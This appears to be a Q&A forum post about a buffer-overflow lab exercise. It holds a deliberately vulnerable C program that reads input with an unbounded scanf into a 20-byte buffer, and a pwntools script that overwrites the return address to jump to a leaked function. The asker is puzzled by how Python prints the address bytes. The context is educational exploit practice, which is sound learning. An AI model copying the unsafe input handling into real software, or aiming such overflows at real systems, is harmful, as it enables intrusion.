# How do I convert an adress to little endian such that I can feed it to my exploit?

Tags: python, buffer-overflow

I'm doing a small exploit exercise.
For this purpose, I have the following file:

```
#include <stdio.h>
void secretFunction() { 
       printf("Congratulations!\n");
       printf("You have entered in the secret function!\n");
}
void echo() { 
       char buffer[20];
       printf("Enter some text:\n"); 
       scanf("%s", buffer); 
       printf("You entered: %s\n", buffer);}

int main() { 
     printf("%p \n", secretFunction); echo();
     return 0;
 }
```

The basic idea is very simple, the program starts by outputting a memory adress for a secret function, and then the exploiter can overflow the buffer in the "echo" function" and reroute the program to the adress of the secret function.

I used a pwntools template to make the exploit:

```
from pwn import *
Set up pwntools for the correct architecture
context.update(arch='i386') exe = './vuln_aslr'
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    return process([exe] + argv, *a, **kw)
gdbscript = ''' continue '''.format(**locals())
#===========================================================
#EXPLOIT GOES HERE
#===========================================================
io = start() addr = io.recvline() print(addr)
addrINT = int(str(addr).replace("\\n" , "").replace("b\'", "").replace("'", "").replace(" ", ""),0)
littleEndianAddr = addrINT.to_bytes(length=4, byteorder="little")
print(littleEndianAddr)

msg1  = io.recvline()

print(type(msg1))
print(msg1)

io.sendline(32*b"a" + littleEndianAddr)

io.interactive()
```

So the important part is of course below "EXPLOIT GOES HERE". ( I know the addr line is really ugly)
I first run this on a file  with aslr disabled. Here, the memory adress (the  "addr" variable) is:

```
b'0x80491d6 \n'
```

I convert this variable to a int, and then use "to_bytes" to convert it to little endian input I can use.
This produces the littleEndianAddr variable that looks like this:

```
b'\xd6\x91\x04\x08'
```

This I can just pass to the program, and my secret function will be invoked:

```
io.sendline(32*b"a" + littleEndianAddr)
```

Now, this all works the way it should, but now I turn on aslr for my executable, and I try again.
This time, the memory adress of the secret function is:

```
b'0x5655f20d \n'
```

But when this is converted to the little endian input that want to exploit with, I get this:

```
b'\r\xf2UV'
```

The elements are simply their hex representation!
And now my exploit doesnt work, my function never runs.
I'm guessing this is because the littleEndianAddr just has regular chars, and is not understood as a memory adress by my computer.

Why is the second memory adress treated differently be "to_bytes"? What can I do to get a memory adress that works, that I can inject?

**EDIT**

I now tried the pwntools p32 function as well. The same thing happens here. If I have this sample code with the non-aslr adress:

```
In [1]: s = 0x80491d6

In [2]:  from pwn import *

In [3]: print(p32(s))
b'\xd6\x91\x04\x08'
```

But when I try the same thing with the aslr-leaked adress:

```
In [4]: s = 0x565cb20d

In [5]: print(p32(s))
b'\r\xb2\\V'
```

I guess the function does what it is supposed to do, since it just otuputs the ascii chars that represent the values, but how do I get it to print ion the format that I need?
Such that it works like a memoery adress

Comment: This should work regardless of the form - bytes are bytes. If they are in printable range they will be printed as such, if they are outside printable range, they will be written as hex-encoded values. But the value is the same and you are sending the bytes anyway. From your code it doesn't looks like you need them in any specific form.

Comment: This is a Python question, not an RE question. See [this](https://stackoverflow.com/questions/29275085/python-string-to-escaped-hex)